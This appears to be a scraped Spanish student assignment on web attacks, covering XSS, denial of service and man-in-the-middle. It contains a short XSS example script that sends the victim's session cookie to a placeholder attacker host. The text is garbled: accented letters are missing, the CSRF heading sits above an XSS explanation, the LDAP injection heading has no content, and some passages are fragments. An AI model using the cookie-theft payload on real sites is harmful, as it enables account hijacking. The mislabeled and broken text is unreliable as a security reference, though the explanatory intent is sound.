Академический Документы
Профессиональный Документы
Культура Документы
Ingeniero en computacin
Ingeniero en computacin
Cross-Site
Request
Forgery
(CSRF)
falsificacin de peticin en sitios cruzados
Ingeniero en computacin
Cross-site Scripting (XSS) es una tcnica de ataque que fuerza un sitio web a
repetir el cdigo ejecutable suministrado por un atacante, el cual se carga en el
navegador del usuario. El cdigo normalmente est escrito en HTML/JavaScript,
pero tambin puede extenderse a VBScript, ActiveX, Java, Flash, o cualquier
otra tecnologa soportada por el navegador.
Cuando un atacante consigue que el navegador de un usuario ejecute su
cdigo, el cdigo se ejecutar dentro del contexto de seguridad (o zona) del
sitio web. Con este nivel de privilegio, el cdigo tiene la habilidad de leer,
modificar y transmitir cualquier dato sensible accesible por el navegador. Un
usuario objeto de este ataque podra tener su cuenta secuestrada (robo de
cookie), su navegador redirigido a otra direccin, o posiblemente mostrando
contenido fraudulento entregado por el sitio web que est visitando. Los
ataques de Cross-site Scripting comprometen esencialmente la relacin de
confianza entre el usuario y el sitio web.
Ejemplo
Ataque persistente
Muchos sitios web hospedan boletines de noticias donde usuarios registrados
pueden publicar mensajes. A un usuario registrado comnmente se le sigue la
pista usando una cookie de ID de sesin autorizndole para publicar mensajes.
Si un atacante public un mensaje conteniendo un javascript hbilmente
construido, un usuario leyendo este mensaje podra tener sus cookies y su
cuenta comprometidas.
Fragmento de cdigo de robo de cookie:
<SCRIPT>
document.location=
'http://attackerhost.example/cgi-bin/
cookiesteal.cgi?'+document.cookie
</SCRIPT>
Ingeniero en computacin
Denial of Service
En un ataque de denegacin de servicio (DoS), un atacante intenta evitar que
los usuarios legtimos tengan acceso a informacin o servicios. Al dirigirse a su
ordenador y su conexin a la red, o las computadoras y la red de los sitios que
usted est tratando de usar, un atacante puede ser capaz de impedirle el
acceso a correo electrnico, sitios web, cuentas en lnea (banca, etc.), u otros
servicios que confiar en el ordenador afectado.
El tipo ms comn y obvia de ataque DoS ocurre cuando un atacante
"inundaciones" una red con informacin. Cuando escribe una direccin URL de
un sitio web en particular en su navegador, usted est enviando una solicitud
al servidor de la computadora de ese sitio para ver la pgina. El servidor slo
puede procesar una cierta cantidad de solicitudes a la vez, por lo que si un
atacante sobrecarga el servidor con solicitudes, no puede procesar su solicitud.
Se trata de una "denegacin de servicio" porque no se puede acceder a ese
sitio.
Un atacante puede utilizar mensajes de correo electrnico de spam para lanzar
un ataque similar en su cuenta de correo electrnico. Si usted tiene una cuenta
de correo electrnico proporcionada por su empleador o una disponible a
travs de un servicio gratuito como Yahoo o Hotmail, se le asign una cuota
especfica, lo que limita la cantidad de datos que puede tener en su cuenta en
cualquier momento dado. Mediante el envo de muchos, o grandes mensajes,
correo electrnico a la cuenta, un atacante puede consumir su cuota, lo que
impide la recepcin de mensajes legtimos. (McDowell, 2013)
LDAP injection
Ingeniero en computacin
Man-in-the-middle
Un ataque man-in-the-middle es un tipo de ataque ciberntico, donde actor
malicioso le inserta / a s misma en una conversacin entre dos partes,
suplanta ambos partidos y accede a la informacin de que las dos partes
estaban tratando de enviar a la otra. Un ataque man-in-the-middle permite
actor malicioso para interceptar, enviar y recibir datos destinados a otra
persona, o no destinado a ser enviado a todos, sin ninguna de las partes fuera
de saber hasta que sea demasiado tarde. Man-in-the-middle ataques pueden
ser abreviados de muchas maneras, incluyendo MITM, MitM, MiM o MIM.
Ingeniero en computacin
Ingeniero en computacin
(DuPaul)
TRABAJO:
Ingeniero en computacin
TRABAJO:
Ingeniero en computacin
(Saxena, 2014)
Ingeniero en computacin